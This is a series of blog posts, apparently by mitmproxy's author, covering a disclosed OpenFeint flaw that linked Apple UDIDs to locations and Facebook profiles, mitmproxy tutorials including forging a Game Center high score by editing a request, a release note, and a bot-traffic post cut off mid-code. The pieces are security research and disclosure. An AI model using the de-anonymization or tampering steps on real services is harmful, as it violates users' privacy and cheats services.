set of privacy-sensitive information. OpenFeint's ubiquity is one of the reasons
why UDID de-anonymization using their API is so serious.</p>
<h2 id="behind-them-are-a-long-tail-of-smaller-aggregators">... behind them is a long tail of smaller aggregators</h2>
<p>Here is a list of all the remaining domains that had UDIDs transmitted to them - a
mixture of ad networks, analytics firms, individual developer sites, and
online services.</p>
<table>
<tr>
<td> ads.mp.mydas.mobi </td>
<td> analytics.localytics.com </td>
<td> api.dropbox.com </td>
</tr>
<tr>
<td> bayobongo.com </td>
<td> bbc.112.2o7.net </td>
<td> beatwave.collect3.com.au </td>
</tr>
<tr>
<td> catalog.lexcycle.com </td>
<td> data.mobclix.com </td>
<td> init.gc.apple.com </td>
</tr>
<tr>
<td> msh.amazon.com </td>
<td> notifications.lexcycle.com </td>
<td> promo.limbic.com </td>
</tr>
<tr>
<td> soma.smaato.com </td>
<td> www.chimerasw.com </td>
<td> www.phasiclabs.com </td>
</tr>
<tr>
<td> www.trainyard.ca </td>
<td> api.twitter.com </td>
<td> ngpipes.ngmoco.com </td>
</tr>
<tr>
<td> npr.122.2o7.net </td>
<td> ws.tapjoyads.com </td>
<td> </td>
</tr>
</table>
<h2 id="methodology">Methodology</h2>
<p>For each application, I started a logging instance of mitmdump, like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">mitmdump -w</span><span style="color:#c0c5ce;"> appname
</span></code></pre>
<p>I then started up the application, interacted with anything that might elicit
network traffic, and shut it down. The collected data was analyzed with a simple
script that used the <a href="http://mitmproxy.org/doc/library.html">libmproxy</a> API to
traverse the traffic dumps and extract the needed information.</p>
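<p>The analysis step might look something like the sketch below. It is
hypothetical - the real script traversed mitmproxy dump files via the
libmproxy API, while this version works over pre-decoded
(scheme, host, request_text) records - but the logic is the same: find every
host that received the UDID, and note whether all of its UDID traffic was
encrypted:</p>
<pre>
<code>def udid_report(flows, udid):
    """Map each host that received the UDID to True if every such
    transmission went over HTTPS, False otherwise."""
    report = {}
    for scheme, host, text in flows:
        if udid.lower() in text.lower():
            seen = report.setdefault(host, scheme == "https")
            # A host counts as "encrypted" only if ALL of its
            # UDID transmissions were HTTPS.
            report[host] = seen and scheme == "https"
    return report

# Invented sample records standing in for a decoded traffic dump:
flows = [
    ("https", "api.openfeint.com", "udid=ABC123"),
    ("http", "ads.example.com", "udid=ABC123&x=1"),
    ("https", "ads.example.com", "udid=ABC123"),
    ("https", "clean.example.com", "no identifier here"),
]
report = udid_report(flows, "ABC123")
print(report)
</code></pre>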
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>Since 54% of UDID-using apps encrypted all of their UDID traffic, they
would have gone undetected by Smith's unencrypted-only study, so one would
expect a much greater difference between our results than Smith's 68% versus
my 74%. The small gap can be accounted for by our different samples - Smith
predominantly used applications from Apple's "Top Free" lists, whereas I used
both paid and free applications that happened to be on my phone.</p>
</div>
De-anonymizing Apple UDIDs with OpenFeint
2011-05-04T00:00:00+00:00
2011-05-04T00:00:00+00:00
https://corte.si/posts/security/openfeint-udid-deanonymization/
<p>Every iPhone, iPad and iPod touch has an associated Unique Device Identifier
(UDID). You can think of the UDID as a serial number burned into the device -
one that can't be removed or changed<sup class="footnote-reference"><a href="#1">1</a></sup>. This number is exposed to app
developers through an API, without requiring the device owner's permission or
knowledge.</p>
<p>Few Apple users realise just how widely their UDIDs are used. <a href="http://www.pskl.us/wp/?p=476">Research
shows</a> that 68% of apps silently send UDIDs to
servers on the Internet. This is often accompanied by information on how, when
and where the device is used. The most common destination for traffic
containing a user's UDID is Apple itself, followed by the
<a href="http://www.flurry.com/">Flurry</a> mobile analytics network and OpenFeint, a
mobile social gaming company. These companies are uber-aggregators of
UDID-linked user information, because so many apps use their APIs. Trailing
behind the big three are thousands of individual developer sites, ad servers and
smaller analytics firms. Users have no way to stop their device from offering up
their UDID, to tell who their data is being sent to, or even to know that it's
happening at all. This situation has caused widespread concern, including
coverage in the <a href="http://blogs.wsj.com/digits/2010/12/19/unique-phone-id-numbers-explained/">Wall Street
Journal</a>,
and <a href="http://www.txinjuryblog.com/tags/udid-lawsuit/">two</a>
<a href="http://www.infosecurity-us.com/view/15643/apple-faces-second-lawsuit-over-udid-disclosure-to-third-parties/">lawsuits</a>
aimed at Apple.</p>
<p>The saving grace is that your device UDID is not linked to your real-world
identity. If it were possible to de-anonymize UDIDs, the result would be a
serious privacy breach. Apple is well aware of this, and <a href="http://developer.apple.com/library/ios/#documentation/uikit/reference/UIDevice_Class/Reference/UIDevice.html">explicitly tells
developers that they are not permitted to publicly link a UDID to a user
account</a>.</p>
<p>I recently published a tool called <a href="http://mitmproxy.org">mitmproxy</a>, a
man-in-the-middle proxy that allows one to intercept and monitor SSL-encrypted
HTTP traffic. Using mitmproxy to view the encrypted traffic sent by my own iOS
devices, I was able to observe protocols and data flows that have clearly
received very little external review. A slew of interesting security results
followed (keep an eye on this blog), but by far the most alarming was the fact
that it was possible to use OpenFeint to completely de-anonymize a large
proportion of UDIDs.</p>
<h2 id="de-anonymizing-udids-with-openfeint">De-anonymizing UDIDs with OpenFeint</h2>
<h3 id="linking-udids-to-openfeint-user-accounts">Linking UDIDs to OpenFeint user accounts</h3>
<p>When an OpenFeint-enabled app is first fired up, it submits the device's UDID to
OpenFeint's servers, which then return a list of associated accounts:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">https://api.openfeint.com/users/for_device.xml?udid=XXX
</span></code></pre>
<p>This is a completely unauthenticated call - you can try it out by cutting and
pasting it into your browser, replacing XXX with <a href="http://support.apple.com/kb/HT4061">your own
UDID</a>. Here's an example of the response for
my UDID, with sensitive information removed:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><?</span><span style="color:#bf616a;">xml </span><span style="color:#d08770;">version</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">1.0</span><span style="color:#c0c5ce;">" </span><span style="color:#d08770;">encoding</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">UTF-8</span><span style="color:#c0c5ce;">"?>
<</span><span style="color:#bf616a;">resources</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">user</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">chat_enabled</span><span style="color:#c0c5ce;">>true</</span><span style="color:#bf616a;">chat_enabled</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">gamer_score</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">gamer_score</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">id</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">id</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">last_played_game_id</span><span style="color:#c0c5ce;">>187402</</span><span style="color:#bf616a;">last_played_game_id</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">last_played_game_name</span><span style="color:#c0c5ce;">>tiny wings</</span><span style="color:#bf616a;">last_played_game_name</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">lat</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">lat</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">lng</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">lng</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">online</span><span style="color:#c0c5ce;">>false</</span><span style="color:#bf616a;">online</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">profile_picture_source</span><span style="color:#c0c5ce;">>FbconnectCredential</</span><span style="color:#bf616a;">profile_picture_source</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">profile_picture_updated_at</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">profile_picture_updated_at</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">profile_picture_url</span><span style="color:#c0c5ce;">>http://XXX>
<</span><span style="color:#bf616a;">uploaded_profile_picture_content_type </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">true</span><span style="color:#c0c5ce;">">
</</span><span style="color:#bf616a;">uploaded_profile_picture_content_type</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">uploaded_profile_picture_file_name </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">true</span><span style="color:#c0c5ce;">">
</</span><span style="color:#bf616a;">uploaded_profile_picture_file_name</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">uploaded_profile_picture_file_size </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">true</span><span style="color:#c0c5ce;">">
</</span><span style="color:#bf616a;">uploaded_profile_picture_file_size</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">uploaded_profile_picture_updated_at </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">true</span><span style="color:#c0c5ce;">">
</</span><span style="color:#bf616a;">uploaded_profile_picture_updated_at</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">name</span><span style="color:#c0c5ce;">>XXX</</span><span style="color:#bf616a;">name</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">user</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">resources</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>Included are my latitude and longitude, the last game I played, my chosen
account name, and my Facebook profile picture URL.</p>
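<p>Pulling the identifying fields out of a response like the one above is
straightforward with the standard library. A sketch - the field names come
from the response shown, but the sample values here are invented:</p>
<pre>
<code>import xml.etree.ElementTree as ET

def parse_openfeint_profile(xml_text):
    """Extract the privacy-relevant fields from an OpenFeint
    /users/for_device.xml response."""
    user = ET.fromstring(xml_text).find("user")
    fields = ("name", "last_played_game_name", "lat", "lng",
              "profile_picture_url")
    return {f: user.findtext(f) for f in fields}

# Trimmed sample response with invented values:
sample = """<resources>
  <user>
    <last_played_game_name>tiny wings</last_played_game_name>
    <lat>-45.87</lat>
    <lng>170.50</lng>
    <profile_picture_url>http://example.invalid/pic.jpg</profile_picture_url>
    <name>somegamer</name>
  </user>
</resources>"""
print(parse_openfeint_profile(sample))
</code></pre>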
<h2 id="linking-udids-to-gps-co-ordinates">Linking UDIDs to GPS co-ordinates</h2>
<p>If the user has opted to allow OpenFeint to use their location, latitude and
longitude are returned in the profile results. This lets us trivially associate
a UDID with GPS co-ordinates.</p>
<p><em>The location leak was fixed by OpenFeint after my report. Although some
portions of the OpenFeint API still return a user location, it seems that it
is no longer served for direct profile requests.</em></p>
<h2 id="linking-udids-to-facebook-profiles">Linking UDIDs to Facebook profiles</h2>
<p>If the user registered a Facebook account with OpenFeint, a profile picture URL
hosted by the Facebook CDN was returned in the user's profile data. Facebook
profile picture URLs include the user's Facebook ID, directly linking it to
their Facebook account.</p>
<p>For example, here's Bruce Schneier's Facebook profile picture URL:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">http://profile.ak.fbcdn.net/hprofile-ak-snc4/41795_60615378024_8092_n.jpg
</span></code></pre>
<p>The 11-digit number in this URL is his Facebook user ID. We can now view his
profile using a URL like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">http://www.facebook.com/profile.php?id=60615378024
</span></code></pre>
<p>This final step represents a complete de-anonymization of the UDID, directly
linking the supposedly anonymous identifier with a user's real-world identity.</p>
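<p>The extraction is mechanical. Here is a sketch in Python, keyed to the
historical fbcdn URL format shown above (the pattern is an assumption based on
that one example, and may not cover every variant):</p>

```python
import re

def facebook_id_from_cdn_url(url):
    """Pull the Facebook user ID out of an fbcdn profile picture URL of
    the (historical) form .../41795_60615378024_8092_n.jpg, where the
    middle underscore-separated field is the user ID."""
    m = re.search(r"/\d+_(\d+)_\d+_\w+\.jpg$", url)
    return m.group(1) if m else None

url = "http://profile.ak.fbcdn.net/hprofile-ak-snc4/41795_60615378024_8092_n.jpg"
uid = facebook_id_from_cdn_url(url)
print("http://www.facebook.com/profile.php?id=%s" % uid)
```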
<p><em>The Facebook ID leak was fixed by OpenFeint after my report.</em></p>
<h2 id="openfeint-s-response">OpenFeint's response</h2>
<p>I reported this problem to OpenFeint on the 5th of April. I did not hear back from
them immediately, but I knew they were working on the problem because their API
stopped returning GPS coordinates and Facebook profile picture URLs. On the
12th, I received an email from Jason Citron, OpenFeint's CEO, who wanted to set
up a phone conversation between himself, an OpenFeint legal representative, and
me. We
spoke on the evening of the 20th of April. I recapped my findings and expressed
concern that their API still linked UDIDs to user accounts. They thanked me for
the vulnerability report, confirmed that they had tightened their API in
response to it, and asked for more time to consider the issue before I released
anything. The following morning, it was announced that OpenFeint had been
<a href="http://openfeint.com/company/press/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users">bought by GREE for $104
million</a>.</p>
<p>Last week I received what I assume is OpenFeint's last word on the matter, in
the form of an email from Jason Citron: "We will continue to pay attention to
the issues you raised and will continue to adjust our practices as necessary."
At the time of writing, OpenFeint's API still allows you to associate a UDID
with private user information.</p>
<h2 id="impact">Impact</h2>
<p>Testing with a small corpus of UDIDs gathered from my own and friends' devices,
I was able to link roughly 30% of UDIDs to GPS co-ordinates, 20% of users to a
weak identity (e.g. OpenFeint profile picture, user-chosen account name), and
10% of UDIDs directly to a Facebook profile. I stress that my sample was small
and probably unrepresentative - only OpenFeint knows what the real numbers are.
Nonetheless, we can make a broad guess at the magnitude of the problem, based
on the fact that OpenFeint <a href="http://openfeint.com/company/press/33-GREE-Puts-Over-100-Million-into-OpenFeint-to-Drive-Global-Expansion-with-100M-users">claims to have 75 million
users</a>:</p>
<ul>
<li>This would mean that about 7.5 million users may have had Facebook accounts
linked publicly to their UDIDs until OpenFeint stopped returning profile
picture URLs a few weeks ago.</li>
<li>About 22.5 million users may have had GPS co-ordinates linked publicly to
their UDIDs until the issue was corrected.</li>
<li>About 15 million users may still have weakly identifying information
exposed - profile pictures and user-chosen account names that can often be
traced back to a real person.</li>
<li>All 75 million users still have personal details like the last
OpenFeint-enabled game they played and whether they are online (i.e. logged in
to the OpenFeint network) exposed.</li>
</ul>
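<p>The arithmetic behind these estimates is simply my sample rates applied to
the claimed user base:</p>

```python
# Extrapolating my (small, probably unrepresentative) sample rates to
# OpenFeint's claimed user base. Magnitude guesses, not measurements.
users = 75_000_000

facebook_linked = users * 10 // 100  # UDIDs linked to Facebook profiles
gps_linked      = users * 30 // 100  # UDIDs linked to GPS co-ordinates
weak_identity   = users * 20 // 100  # profile picture, account name

print(facebook_linked)  # 7500000
print(gps_linked)       # 22500000
print(weak_identity)    # 15000000
```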
<p>Although the Facebook and GPS de-anonymization issues have been repaired, we
have to consider the possibility that these vulnerabilities have already been
used to de-anonymize a database of UDIDs.</p>
<h2 id="conclusion">Conclusion</h2>
<p>I want to stress that the problem here is not primarily with OpenFeint. By
designing an API to expose UDIDs and encouraging developers to use it, Apple
has ensured that there are literally thousands of databases linking UDIDs to
sensitive user information on the net. A leak from any one of these - or worse
a large-scale de-anonymization like the OpenFeint one - inevitably has serious
consequences for user privacy.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>I should note that this is not quite accurate. The UDID is actually a
computed value - a hash calculated over a set of identifying hardware
attributes. In a sense, it only really exists as an API call.</p>
</div>
mitmproxy: A 30-second client playback example
2011-03-31T00:00:00+00:00
2011-03-31T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/tute-30-seconds/
<p><a href="https://corte.si/posts/code/mitmproxy/announce0_4/">Yesterday</a> I published version 0.4 of
<a href="http://mitmproxy.org">mitmproxy</a> - an intercepting proxy for HTTP/S traffic.
The tool already has pretty complete documentation, but I've decided to write a
series of less formal tutorials to showcase its abilities. Below is the first,
and simplest, of these - keep an eye on the blog for more in the coming days.</p>
<h2 id="a-30-second-client-playback-example">A 30-second client playback example</h2>
<p>My local cafe is serviced by a rickety and unreliable wireless network,
generously sponsored with ratepayers' money by our city council. After
connecting, you are redirected to an SSL-protected page that prompts you for a
username and password. Once you've entered your details, you are free to enjoy
the intermittent dropouts, treacle-like speeds and incorrectly configured
transparent proxy.</p>
<p>I tend to automate this kind of thing at the first opportunity, on the theory
that time spent now will be more than made up in the long run. In this case, I
might use <a href="http://getfirebug.com/">Firebug</a> to ferret out the form post
parameters and target URL, then fire up an editor to write a little script
using Python's <a href="http://docs.python.org/library/urllib.html">urllib</a> to simulate
a submission. That's a lot of futzing about. With mitmproxy we can do the job
in literally 30 seconds, without having to worry about any of the details.
Here's how.</p>
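<p>For comparison, here is roughly what that throwaway urllib script would look
like. This is a sketch only: the URL and form field names below are invented
placeholders, standing in for whatever Firebug actually turns up.</p>

```python
import urllib.parse
import urllib.request

# Hypothetical login endpoint and form fields -- the real values would
# have to be ferreted out of the portal's login form first.
LOGIN_URL = "https://wifi.example.org/login"
params = urllib.parse.urlencode({
    "username": "me",
    "password": "secret",
}).encode()

def log_in():
    """POST the form exactly as the browser would; return the HTTP status."""
    with urllib.request.urlopen(LOGIN_URL, data=params) as resp:
        return resp.status
```

With mitmproxy, none of this reverse engineering is necessary - the recorded
conversation already contains the exact request.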
<h3 id="1-run-mitmdump-to-record-our-http-conversation-to-a-file">1. Run mitmdump to record our HTTP conversation to a file.</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> mitmdump </span><span style="color:#bf616a;">-w</span><span style="color:#c0c5ce;"> wireless-login
</span></code></pre><h3 id="2-point-your-browser-at-the-mitmdump-instance">2. Point your browser at the mitmdump instance.</h3>
<p>I use a tiny Firefox addon called <a href="https://addons.mozilla.org/en-us/firefox/addon/toggle-proxy-51740/">Toggle
Proxy</a> to
switch quickly to and from mitmproxy. I'm assuming you've already <a href="http://mitmproxy.org/doc/ssl.html">configured
your browser with mitmproxy's SSL certificate
authority</a>.</p>
<h3 id="3-log-in-as-usual">3. Log in as usual.</h3>
<p>And that's it! You now have a serialized version of the login process in the
file wireless-login, and you can replay it at any time like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> mitmdump </span><span style="color:#bf616a;">-c</span><span style="color:#c0c5ce;"> wireless-login
</span></code></pre><h2 id="embellishments">Embellishments</h2>
<p>We're really done at this point, but there are a couple of embellishments we
could make if we wanted. I use <a href="http://wicd.sourceforge.net/">wicd</a> to
automatically join wireless networks I frequent, and it lets me specify a
command to run after connecting. I used the client replay command above and
voila! - totally hands-free wireless network startup.</p>
<p>We might also want to prune requests that download CSS, JS, images and so forth.
These add only a few moments to the time it takes to replay, but they're not
really needed and I somehow feel compelled to trim them anyway. So, we fire up the
mitmproxy console tool on our serialized conversation, like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> mitmproxy </span><span style="color:#bf616a;">wireless-login
</span></code></pre>
<p>We can now go through and manually delete (using the <strong>d</strong> keyboard shortcut)
everything we want to trim. When we're done, we use <strong>S</strong> to save the
conversation back to the file.</p>
mitmproxy: Breaking Apple's Game Center with replay
2011-03-31T00:00:00+00:00
2011-03-31T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/tute-gamecenter/
<p>This is the second in the series of tutorials I'm writing for
<a href="http://mitmproxy.org">mitmproxy</a>. You can find the first one - a 30 second
tutorial on client replay - <a href="https://corte.si/posts/code/mitmproxy/tute-30-seconds/">here</a>.
There will be more to come in the next few days.</p>
<h2 id="the-setup">The setup</h2>
<p>In this tutorial, I'm going to show you how simple it is to creatively interfere
with Apple Game Center traffic using mitmproxy. To set things up, I registered
my mitmproxy CA certificate with my iPhone - there's a <a href="http://mitmproxy.org/doc/certinstall/ios.html">step by step set of
instructions</a> for doing this in
the mitmproxy docs. I then started mitmproxy on my desktop, and configured the
iPhone to use it as a proxy.</p>
<h2 id="taking-a-look-at-the-game-center-traffic">Taking a look at the Game Center traffic</h2>
<p>Let's take a first look at the Game Center traffic. The game I'll use in this
tutorial is <a href="http://itunes.apple.com/us/app/super-mega-worm/id388541990?mt=8">Super Mega
Worm</a> - a great
little retro-apocalyptic sidescroller for the iPhone:</p>
<div class="media">
<a href="supermega.png">
<img src="supermega.png" />
</a>
</div>
<p>After finishing a game (take your time), watch the traffic flowing through
mitmproxy:</p>
<div class="media">
<a href="one.png">
<img src="one.png" />
</a>
</div>
<p>We see a bunch of things we might expect - initialisation, the retrieval of
leaderboards and so forth. Then, right at the end, there's a POST to this
tantalising URL:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">https://service.gc.apple.com/WebObjects/GKGameStatsService.woa/wa/submitScore
</span></code></pre>
<p>The contents of the submission are particularly interesting:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><</span><span style="color:#bf616a;">plist </span><span style="color:#d08770;">version</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">1.0</span><span style="color:#c0c5ce;">">
<</span><span style="color:#bf616a;">dict</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>category</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">string</span><span style="color:#c0c5ce;">>SMW_Adv_USA1</</span><span style="color:#bf616a;">string</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>score-value</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>55</</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>timestamp</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>1301553284461</</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">dict</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">plist</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>This is a <a href="http://en.wikipedia.org/wiki/Property_list">property list</a>,
containing an identifier for the game, a score (55, in this case), and a
timestamp. Looks pretty simple to mess with.</p>
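<p>As an aside, this format is also trivial to manipulate programmatically,
using Python's standard plistlib. A minimal sketch, working on a copy of the
captured body (simplified - the real request may contain additional keys):</p>

```python
import plistlib

# A copy of the captured score submission (simplified).
body = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>category</key>
    <string>SMW_Adv_USA1</string>
    <key>score-value</key>
    <integer>55</integer>
    <key>timestamp</key>
    <integer>1301553284461</integer>
</dict>
</plist>"""

submission = plistlib.loads(body)
submission["score-value"] = 2200272667  # bump the score
modified = plistlib.dumps(submission)   # re-serialize for replay
```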
<h2 id="modifying-and-replaying-the-score-submission">Modifying and replaying the score submission</h2>
<p>Let's edit the score submission. First, select it in mitmproxy, then press
<strong>enter</strong> to view it. Make sure you're viewing the request, not the response -
you can use <strong>tab</strong> to flick between the two. Now press <strong>e</strong> for edit. You'll
be prompted for the part of the request you want to change - press <strong>b</strong> for
body. Your preferred editor (taken from the EDITOR environment variable) will
now fire up. Let's bump the score up to something a bit more ambitious:
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><</span><span style="color:#bf616a;">plist </span><span style="color:#d08770;">version</span><span style="color:#c0c5ce;">="</span><span style="color:#a3be8c;">1.0</span><span style="color:#c0c5ce;">">
<</span><span style="color:#bf616a;">dict</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>category</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">string</span><span style="color:#c0c5ce;">>SMW_Adv_USA1</</span><span style="color:#bf616a;">string</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>score-value</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>2200272667</</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>timestamp</</span><span style="color:#bf616a;">key</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>1301553284461</</span><span style="color:#bf616a;">integer</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">dict</span><span style="color:#c0c5ce;">>
</</span><span style="color:#bf616a;">plist</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>Save the file and exit your editor.</p>
<p>The final step is to replay this modified request. Simply press <strong>r</strong> for
replay.</p>
<h2 id="the-glorious-result-and-some-intrigue">The glorious result and some intrigue</h2>
<div class="media">
<a href="leaderboard.png">
<img src="leaderboard.png" />
</a>
</div>
<p>And that's it - according to the records, I am the greatest Super Mega Worm
player of all time.</p>
<p>Curiously, the top competitors' scores are all the same: 2,147,483,647. If you
think that number seems familiar, you're right: it's 2^31-1, the maximum value
you can fit into a signed 32-bit int. Now let me tell you another peculiar
thing about Super Mega Worm - at the end of every game, it submits your highest
previous score to the Game Center, not your current score. This means that it
stores your high score somewhere, and I'm guessing that it reads that stored
score back into a signed integer. So, if you <em>were</em> to cheat by the relatively
pedestrian means of modifying the saved score on your jailbroken phone, then
2^31-1 might well be the maximum score you could get. Then again, if the game
itself stores its score in a signed 32-bit int, you could get the same score
through perfect play, effectively beating the game. So, which is it in this
case? I'll leave that for you to decide.</p>
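<p>A quick sanity check on that suspicious ceiling:</p>

```python
# 2,147,483,647 -- the score shared by all the top competitors -- is
# exactly the largest value a signed 32-bit integer can hold.
max_signed_32 = 2**31 - 1
print(max_signed_32)  # 2147483647
```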
mitmproxy 0.4 has been released
2011-03-30T00:00:00+00:00
2011-03-30T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_4/
<div class="media">
<a href="../mitmproxy_0_4.png">
<img src="../mitmproxy_0_4.png" />
</a>
</div>
<p>I've just tagged and released mitmproxy 0.4. You can download it from the new
project website:</p>
<h2 id="mitmproxy-org"><a href="http://mitmproxy.org">mitmproxy.org</a></h2>
<p>This is a huge update, with dozens
of new features, and improvements to almost every aspect of the project. A few
highlights are:</p>
<ul>
<li>Complete serialization of HTTP/S conversations</li>
<li>On-the-fly generation of SSL interception certificates</li>
<li>Ability to replay both the client and the server side of HTTP/S conversations</li>
<li>mitmdump has grown up to be a powerful tcpdump-like commandline tool for HTTP/S</li>
<li>Scripting hooks for programmatic modification of traffic using Python</li>
<li>Many, many user interface improvements, bug fixes, and minor features</li>
<li>Better <a href="http://mitmproxy.org/doc/index.html">documentation</a>.</li>
</ul>
<p>Special thanks go to <a href="http://www.henriknordstrom.net/">Henrik Nordström</a> for
many great contributions to this release. I'd love more contributors to join
the project - if you feel like hacking on mitmproxy, take a look at the
<a href="https://github.com/cortesi/mitmproxy/blob/master/todo">todo</a> file at the top
of the tree for ideas.</p>
<p>Over the next week I will write a series of tutorials to showcase mitmproxy's
abilities, ranging from simple to quite complex. Keep an eye on the blog for
these - they will be published here first, before making their way into the
official documentation.</p>
Social news eats a blog post
2011-01-24T00:00:00+00:00
2011-01-24T00:00:00+00:00
https://corte.si/posts/socialmedia/post-lifecycle/
<p>This is the second post in which I try to add some data to my nagging doubts
about the technical news ecosystem. In my <a href="https://corte.si/posts/socialmedia/redditgraph/">previous
post</a>, I showed off a visualisation of
how the proggit front page changes over time. In this post, I take a look at the
flip-side of the coin - what happens to a specific post as it passes through the
short, fickle social news cycle? To do this, I'll take a deep dive into my own
server logs, looking at a <a href="https://corte.si/posts/code/cyclesort/">recent post of mine</a>
that appeared briefly on both <a href="http://news.ycombinator.com">Hacker News</a> and
<a href="http://www.reddit.com/r/programming">proggit</a>. I'd guess that nearly all posts
follow more or less the same trajectory as they are extruded through the social
news mill, so this should be interesting to more people than just me. At the
risk of making things a bit dry and descriptive, I'm saving speculation and
interpretation for a future post.</p>
<p>The scene is set at about 10pm New Zealand time, when I put the finishing
touches to my blog post, and fire off an rsync up to my server. I quickly
double-check that the blog and the RSS feed have updated OK, <a href="http://twitter.com/cortesi/status/6627667512131584">tweet a
link</a> to the post, and go to
bed. While I sleep, the post creeps onto both Hacker News and proggit,
ultimately getting 41000 hits over the next 5 days or so. The graphs below show
only the first 50 hours of the post's lifetime - everything after that is just a
long, slow dénouement as it dwindles into obscurity.</p>
<h2 id="our-real-time-robot-overlords">Our real-time robot overlords</h2>
<p>The action starts almost as soon as I click the "tweet" button. Within seconds,
the post is retrieved by Twitterbot. One second later, Googlebot appears, and
almost simultaneously I get hit by Jaxified, Njuice, LinkedIn and PostRank. In
all, 10 bots read my blog post within the first minute, handily beating the
first human, who slouches lethargically into view at a tardy 90 seconds.</p>
<p>Below is a list of the bots that retrieved my post before the first submission
to a social news site. These are the realtime robots, presumably hoovering up
the Twitter firehose and indexing all the links they find. The cast of
characters is a mixture of the expected big fish, stealth startups, and
skunkworks projects at well-known companies. Bot identity was gleaned from HTTP
<a href="http://en.wikipedia.org/wiki/User_agent">user-agent</a> headers when they were
provided, or by checking the ownership of the responsible IP through reverse DNS
resolution and whois lookups when they weren't. Most of the real-time bots were
well behaved, identifying themselves clearly with a URL in the user-agent
string.</p>
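<p>The identification procedure can be sketched roughly as follows. This is an
illustration of the approach described above, not the exact script I used:
prefer a self-identifying user-agent, fall back to reverse DNS on the source
IP (the whois step would need an external tool).</p>

```python
import socket

def identify_bot(ip, user_agent):
    """Best-effort crawler identification: well-behaved bots embed a URL
    in their user-agent string; for the rest, try a reverse DNS lookup
    on the source IP."""
    if "http://" in user_agent or "https://" in user_agent:
        return user_agent
    try:
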